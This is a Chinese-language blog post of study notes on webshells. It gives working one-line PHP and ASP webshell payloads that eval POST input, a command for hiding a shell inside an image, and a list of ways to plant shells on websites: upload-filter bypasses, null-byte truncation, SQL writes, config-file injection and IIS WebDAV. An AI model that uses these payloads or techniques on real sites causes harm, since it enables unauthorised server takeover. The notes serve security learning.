web安全之webshell

一句话验证

<?php phpinfo();?>

一句话木马

<?php @eval($_POST[cmd]);?>

 

 

 

webshell管理工具

webshell木马类型:一句话、小马、大马、图片马、打包马、脱裤马

webshell脚本类型:asp、aspx、jsp、php

asp:<%eval request("password")%>
aspx:
php:<?php eval($_POST[password])?>
jsp:特定jsp客户端

webshell客户端:菜刀(文件管理、虚拟终端、数据库管理、网站爬行等功能)、蚁剑、冰蝎等等。

菜刀

蚁剑

冰蝎

哥斯拉

 

如何制作图片马

#图片马工具c32asm或edjpgcom
拖动图片——添加一句话
#cmd制作
copy  /b  1.jpg+1.asp  2.jpg
#图片属性添加
右键详细信息——版权——插入一句话

如何get webshell

#拿webshell(已进入后台)
直接上传:上传不带密码的木马
数据库备份:利用cms的备份数据库功能,将上传的jpg木马转化成asp木马。(使用bp进行00截断,以图消解转化后的asp木马后缀asa)
突破本地js验证:审查元素里添加允许上传的文件类型如php、改成jpg后上传,bp抓包修改文件后缀
上传其它脚本类型(只限定一机多站情况):通过数据库备份突破限制、修改后缀为xx.asp.
00截断:上传.jpg文件,抓包修改.jpg文件为.php %00解码(或Hex里20改成00),以注释后边。
网站配置插马:页面插入一句话木马、配置文件(头部或尾部)插入一句话木马            菜刀连接该页面或该配置文件
数据库命令执行:通过执行SQL语句写入一句话木马   前提--网站后台支持执行sql且数据库用户权限够大。
添加静态页面:在cms中添加静态页面模板,结合IIS6.0解析漏洞。
更新404页面:WordPress中编辑404页面
上传插件:插件中捆绑木马
修改网站配置:kevion cms修改上传类型为aaspsp

#拿webshell(未进入后台)
dedecms漏洞利用小工具
IIS写权限漏洞:开启webDAV后可使用PUT和MOVE方法,上传txt然后转换成asp。
命令执行漏洞:执行手工构造的命令(上传一句话木马)
文件上传漏洞:上传图片-bp抓包-改成木马的压缩包
SQL注入漏洞:前提-权限大、文件夹有写入权限、已知网站绝对路径。

  

 

 

 

posted @ 2023-05-25 15:45  dustfree  阅读(98)  评论(0编辑  收藏  举报